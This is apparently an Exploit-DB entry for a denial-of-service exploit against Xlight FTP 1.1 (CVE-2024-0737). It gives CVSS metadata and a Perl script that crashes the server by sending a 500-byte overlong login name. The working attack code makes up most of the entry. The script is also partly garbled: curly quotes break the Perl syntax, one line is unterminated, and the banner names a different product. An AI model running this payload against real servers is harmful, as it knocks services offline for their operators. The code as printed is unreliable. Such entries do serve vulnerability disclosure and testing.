Exploit Details
Basic Information
| Exploit Title | Xlight FTP 1.1 – Denial Of Service (DOS) |
|---|---|
| Exploit ID | EDB-ID:52382 |
| Type | exploitdb |
| Published | 2025-07-28T00:00:00 |
| Modified | 2025-07-28T00:00:00 |
CVSS Information
| CVSS Score | 7.5 |
|---|---|
| Severity | HIGH |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
CVE Information
- CVE-2024-0737
Exploit Description
Exploit Code
# Google Dork: N/A
# Date: 22 July 2025
# Exploit Author: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali/
# Vendor Homepage: https://www.xlightftpd.com
# Software Link: N/A
# Version: 1.1
# Tested on: Windows XP
# CVE: CVE-2024-0737
$sis=”$^O”;
if ($sis eq “windows”){
$cmd=”cls”;
} else {
$cmd=”clear”;
}
system(“$cmd”);
intro();
main();
print “[+] Exploiting… \n”;
my $payload = “\x41″x500;
my $ftp = Net::FTP->new($ip, Debug => 0) or die “Não foi possível se conectar ao servidor: $@”;
$ftp->login($payload,”anonymous”) or die “[+] Possibly exploited!”;
$ftp->quit;
print “[+] Done – Exploited success!!!!!\n\n”;
sub intro {
print q {
,–,
_ ___/ /\|
,;'( )__, ) ~
// // ‘–;
‘ \ | ^
^ ^
[+] LightFTP 1.1 – Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: [email protected]
}
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print ” \nUsage: $0
exit(-1);
}
}